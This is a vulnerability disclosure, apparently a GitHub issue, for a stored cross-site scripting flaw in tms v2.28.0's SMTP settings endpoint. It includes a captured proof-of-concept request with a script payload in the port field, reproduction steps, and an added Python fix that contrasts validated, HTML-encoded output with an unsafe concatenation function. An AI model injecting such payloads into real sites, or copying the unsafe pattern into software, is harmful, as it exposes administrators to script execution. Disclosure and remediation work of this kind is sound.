CVE-2022-26246: A cross-site scripting vulnerability exists in tms · Issue #15 · xiweicheng/tms
TMS v2.28.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /TMS/admin/setting/mail/createorupdate.
[Suggested description]
A cross-site scripting (XSS) vulnerability exists in tms. The input submitted from the front-end settings page to /tms/admin/setting/mail/createOrUpdate is not filtered or validated: the form parameters (for example `port`) are passed directly into the setting method of AdminController, saved, and rendered back into the settings page without output encoding, so script injected into a field executes in the browser of any administrator who views the page.
[Vulnerability Type]
Cross Site Scripting (XSS)
[Vendor of Product]
https://github.com/xiweicheng/tms
[Affected Product Code Base]
v2.28.0
[Affected Component]
POST /tms/admin/setting/mail/createOrUpdate HTTP/1.1
Host: localhost:8080
Content-Length: 113
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/tms/admin/setting
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=CDC518A82EFF7D857356EBF9AB4206D2; locale=zh-cn; Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1645520663; Hm_lpvt_a4980171086658b20eb2d9b523ae1b7b=1645601594
Connection: close
host=smtp.163.com&port=25%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E&username=someone%40163.com&password=&addr=&=
[Attack Type]
Remote
[Impact Code execution]
true
[Vulnerability proof]
1. Open http://localhost:8080/tms/admin/setting (as an authenticated administrator) to reach the system settings page.
2. Enter JavaScript in a form field, e.g. in the SMTP port field: <script>alert("XSS")</script>
3. Click Save. An alert pop-up appears, which confirms the vulnerability.
4. Root cause: the data submitted from the front-end page to /tms/admin/setting/mail/createOrUpdate is not filtered or validated; the parameters are passed directly into the setting method of AdminController, stored, and rendered back into the page without HTML encoding, so the injected script executes.
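The two controls a fix for this class of bug needs are shown below as an added example: it is not code from the tms project, and the validation rules, the `render_settings_row` output format and the error messages are assumptions. The field names and the URL-encoded body are taken from the PoC request above. Server-side validation rejects the payload because `port` is not an integer, and HTML encoding on output neutralises anything that does get stored; the unsafe concatenation is kept only for comparison.

```python
"""Validate and encode the SMTP settings form that tms accepts at
/tms/admin/setting/mail/createOrUpdate.

Added illustration, not tms project code. The field names (host, port,
username, password, addr) come from the report's request body; the
validation rules and the HTML row format are assumptions."""

import html
import re
from urllib.parse import parse_qs

# Body captured from the report's PoC request (the trailing "&=" is in the
# original too and is dropped during parsing because its key is empty).
POC_BODY = ("host=smtp.163.com&port=25%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E"
            "&username=someone%40163.com&password=&addr=&=")

# RFC 1123-style hostname: dot-separated labels of letters, digits and hyphens.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$")
# Deliberately simple address check; it rejects whitespace, quotes and angle brackets.
EMAIL_RE = re.compile(r"^[^@\s<>\"']+@[^@\s<>\"']+\.[A-Za-z0-9-]+$")


def parse_form(body):
    """Decode an application/x-www-form-urlencoded body into {field: first value}."""
    fields = parse_qs(body, keep_blank_values=True)
    return {k: v[0] for k, v in fields.items() if k}


def validate_mail_settings(form):
    """Return {field: error}; an empty dict means every field is acceptable."""
    errors = {}
    if not HOSTNAME_RE.match(form.get("host", "")):
        errors["host"] = "not a valid hostname"
    port = form.get("port", "")
    # The PoC payload lives in this field: "25<script>..." is not an integer.
    if not port.isdigit() or not 1 <= int(port) <= 65535:
        errors["port"] = "must be an integer between 1 and 65535"
    for field in ("username", "addr"):
        value = form.get(field, "")
        if value and not EMAIL_RE.match(value):
            errors[field] = "not a valid e-mail address"
    return errors


def render_settings_row(label, value):
    """Hardened output: the stored value is HTML-encoded before it reaches the page."""
    return "<tr><td>%s</td><td>%s</td></tr>" % (
        html.escape(label), html.escape(value, quote=True))


def render_settings_row_unsafe(label, value):
    """Vulnerable pattern for comparison: raw concatenation, no encoding."""
    return "<tr><td>%s</td><td>%s</td></tr>" % (label, value)


if __name__ == "__main__":
    form = parse_form(POC_BODY)
    print("decoded port field:", form["port"])
    print("validation errors:", validate_mail_settings(form))
    print("unsafe:", render_settings_row_unsafe("port", form["port"]))
    print("safe:  ", render_settings_row("port", form["port"]))
```

Validation alone is not enough for fields that legitimately hold free text (a display name, for example), which is why the encoding step must be applied wherever a stored setting is written into HTML; a template engine with auto-escaping enabled achieves the same thing as `html.escape` here.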